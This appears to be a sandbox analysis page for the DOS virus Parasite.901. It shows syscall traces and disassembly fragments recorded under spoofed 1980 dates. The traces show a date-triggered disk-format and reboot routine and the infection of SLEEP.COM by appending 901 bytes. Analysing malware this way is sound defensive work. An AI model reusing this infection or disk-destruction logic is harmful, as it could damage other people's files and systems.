Sample viewer

vx.netlux.org/Virus.DOS.Parasite.901

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:49:13.616152248Z	47	PC: 12a79 \| Get disk transfer address
2018-12-17T22:49:13.618152078Z	26	PC: 12a5e \| Set disk transfer address
2018-12-17T22:49:13.6197016Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9814,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:48.271810417Z	47	PC: 12a79 \| Get disk transfer address
2018-12-25T12:23:48.273277368Z	26	PC: 12a5e \| Set disk transfer address
2018-12-25T12:23:48.280669654Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3
2018-12-25T12:23:48.283322812Z	44	PC: 12ade \| Get time 0x12ade: and dh, 0xf 0x12ae1: cmp dh, 3 0x12ae4: jb 0x12aa0 0x12ae6: cmp dh, 3 0x12ae9: ja 0x12b15 0x12aeb: int 0x19 0x12aed: mov ah, 0x47 0x12aef: xor dl, dl 0x12af1: add si, 0 0x12af4: nop 0x12af5: int 0x21 0x12af7: jb 0x12b15 0x12af9: mov ah, 0x3b 0x12afb: mov dx, si 0x12afd: add dx, 0x40 0x12b00: nop 0x12b01: int 0x21 0x12b03: mov word ptr [bx + 0x43], di 0x12b06: nop 0x12b07: mov si, bx
2018-12-25T12:23:48.286860505Z	78	PC: 12b98 \| Find first file
2018-12-25T12:23:48.294170562Z	67	PC: 12bd9 \| Get or set file attributes
2018-12-25T12:23:48.300300949Z	67	PC: 12beb \| Get or set file attributes
2018-12-25T12:23:48.317557512Z	61	PC: 12bf6 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:23:48.325207227Z	87	PC: 12c02 \| Get or set file date and time
2018-12-25T12:23:48.326605423Z	44	PC: 12c0e \| Get time 0x12c0e: and dh, 7 0x12c11: jmp 0x12c14 0x12c13: nop 0x12c14: mov ah, 0x3f 0x12c16: mov cx, 3 0x12c19: mov dx, 0x29 0x12c1c: nop 0x12c1d: add dx, si 0x12c1f: int 0x21 0x12c21: jb 0x12c7e 0x12c23: cmp ax, 3 0x12c26: jne 0x12c7e 0x12c28: mov ax, 0x4202 0x12c2b: mov cx, 0 0x12c2e: mov dx, 0 0x12c31: int 0x21 0x12c33: jb 0x12c7e 0x12c35: mov cx, ax 0x12c37: sub ax, 3 0x12c3a: mov word ptr [si + 0x2d], ax
2018-12-25T12:23:48.329095074Z	63	PC: 12c21 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:23:48.334286173Z	66	PC: 12c33 \| Move file pointer
2018-12-25T12:23:48.335811087Z	64	PC: 12c5d \| Write file or device (Write 901 bytes on handle 5)
2018-12-25T12:23:48.345076709Z	66	PC: 12c6f \| Move file pointer
2018-12-25T12:23:48.347113487Z	64	PC: 12c7e \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:23:48.356413471Z	87	PC: 12c91 \| Get or set file date and time
2018-12-25T12:23:48.358028633Z	62	PC: 12c95 \| Close file
2018-12-25T12:23:48.367393029Z	67	PC: 12ca4 \| Get or set file attributes
2018-12-25T12:23:48.378433283Z	26	PC: 12cb1 \| Set disk transfer address

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9814,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:48.40438883Z	47	PC: 12a79 \| Get disk transfer address
2018-12-25T12:23:48.405935551Z	26	PC: 12a5e \| Set disk transfer address
2018-12-25T12:23:48.40701957Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3
2018-12-25T12:23:48.410031216Z	44	PC: 12ade \| Get time 0x12ade: and dh, 0xf 0x12ae1: cmp dh, 3 0x12ae4: jb 0x12aa0 0x12ae6: cmp dh, 3 0x12ae9: ja 0x12b15 0x12aeb: int 0x19 0x12aed: mov ah, 0x47 0x12aef: xor dl, dl 0x12af1: add si, 0 0x12af4: nop 0x12af5: int 0x21 0x12af7: jb 0x12b15 0x12af9: mov ah, 0x3b 0x12afb: mov dx, si 0x12afd: add dx, 0x40 0x12b00: nop 0x12b01: int 0x21 0x12b03: mov word ptr [bx + 0x43], di 0x12b06: nop 0x12b07: mov si, bx
2018-12-25T12:23:48.413332155Z	78	PC: 12b98 \| Find first file
2018-12-25T12:23:48.420066622Z	67	PC: 12bd9 \| Get or set file attributes
2018-12-25T12:23:48.426262741Z	67	PC: 12beb \| Get or set file attributes
2018-12-25T12:23:48.723224752Z	61	PC: 12bf6 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:23:48.735188769Z	87	PC: 12c02 \| Get or set file date and time
2018-12-25T12:23:48.73797168Z	44	PC: 12c0e \| Get time 0x12c0e: and dh, 7 0x12c11: jmp 0x12c14 0x12c13: nop 0x12c14: mov ah, 0x3f 0x12c16: mov cx, 3 0x12c19: mov dx, 0x29 0x12c1c: nop 0x12c1d: add dx, si 0x12c1f: int 0x21 0x12c21: jb 0x12c7e 0x12c23: cmp ax, 3 0x12c26: jne 0x12c7e 0x12c28: mov ax, 0x4202 0x12c2b: mov cx, 0 0x12c2e: mov dx, 0 0x12c31: int 0x21 0x12c33: jb 0x12c7e 0x12c35: mov cx, ax 0x12c37: sub ax, 3 0x12c3a: mov word ptr [si + 0x2d], ax
2018-12-25T12:23:48.741037613Z	63	PC: 12c21 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:23:48.750851812Z	66	PC: 12c33 \| Move file pointer
2018-12-25T12:23:48.751976562Z	64	PC: 12c5d \| Write file or device (Write 901 bytes on handle 5)
2018-12-25T12:23:48.758216847Z	66	PC: 12c6f \| Move file pointer
2018-12-25T12:23:48.760557423Z	64	PC: 12c7e \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:23:48.767642857Z	87	PC: 12c91 \| Get or set file date and time
2018-12-25T12:23:48.769401609Z	62	PC: 12c95 \| Close file
2018-12-25T12:23:48.779532646Z	67	PC: 12ca4 \| Get or set file attributes
2018-12-25T12:23:48.790545118Z	26	PC: 12cb1 \| Set disk transfer address

{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9814,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:23:48.6116815Z	47	PC: 12a79 \| Get disk transfer address
2018-12-25T12:23:48.613659891Z	26	PC: 12a5e \| Set disk transfer address
2018-12-25T12:23:48.614749034Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3